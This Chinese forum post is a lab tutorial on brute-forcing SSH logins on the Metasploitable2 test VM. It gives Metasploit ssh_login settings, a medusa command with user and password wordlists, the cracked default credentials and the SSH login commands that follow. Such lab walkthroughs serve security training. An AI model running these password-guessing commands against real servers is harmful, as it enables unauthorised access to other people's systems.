请选择 进入手机版 | 继续访问电脑版
查看: 4667|回复: 1

对metasploitble2测试平台进行ssh爆破

[复制链接]
  • TA的每日心情
    无聊
    2019-3-28 20:02
  • 签到天数: 341 天

    [LV.8]以坛为家I

    发表于 2018-9-3 16:48:35 | 显示全部楼层 |阅读模式

    对metasploitble测试平台进行ssh爆破
    首先要准备暴破字典,一个用户字典,一个密码字典,也可以一个字典同时当用户名和密码用。可以在创建一个目录并创建这两个字典 (mkdir /tools/zidian     ; touch /tools/zidian/ssh_user.txt     ; touch /tools/zidian/ssh_pass.txt) 字典内容随心所欲,但是如果字典太大,可能会造成暴力破解时间过长。不过可以大大增加成功率。

      

    ssh暴力破解有两种方法
    一是使用metasploit,搜索 (search)ssh_login 这个工具进行暴力破解,需要设置用户名字典 set USER_FILE  /tools/zidian/ssh_user.txt 和密码字典 set PASS_FILE  /tools/zidian/ssh_pass.txt  最重要的是设置目标IP set RHOST 192.168.1.1 还有设置一下线程 set THREADS 1000 (根据自己电脑性能设置) 最后运行 run 。。开始暴力破解。

      

    第二种方法是使用 medusa 爆破工具 -l指定地址 、-U 指定用户字典 - P指定密码字典 -M 选择爆破类型。使用方法: medusa -h 192.168.1.1 -U /tools/zidian/ssh_user.txt -P /tools/zidian/ssh_pass.txt -M ssh

      

    OK ,可以看出,爆破出了两个账号和密码。一个是 user user 一个是 msfadmin msfadmin  然后可以登录一下ssh 指定用户登录方法 ssh -l user(或是msfadmin)192.168.1.1 回车后输入密码后登录

      

    不指定用户:ssh 192.168.1.1
    指定用户:
    ssh -l user 192.168.1.1
    ssh user@192.168.1.1

    如果修改过ssh登录端口的可以:
    ssh -p 12333 192.168.1.1
    ssh -l user -p 12333 192.168.1.1
    ssh -p 12333 user@192.168.1.1

    本帖子中包含更多资源

    您需要 登录 才可以下载或查看,没有帐号?注册

    x
    回复

    使用道具 举报

  • TA的每日心情
    无聊
    2019-3-28 20:02
  • 签到天数: 341 天

    [LV.8]以坛为家I

     楼主 发表于 2018-9-3 17:03:41 | 显示全部楼层
    给自己顶一下
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    快速回复 返回顶部 返回列表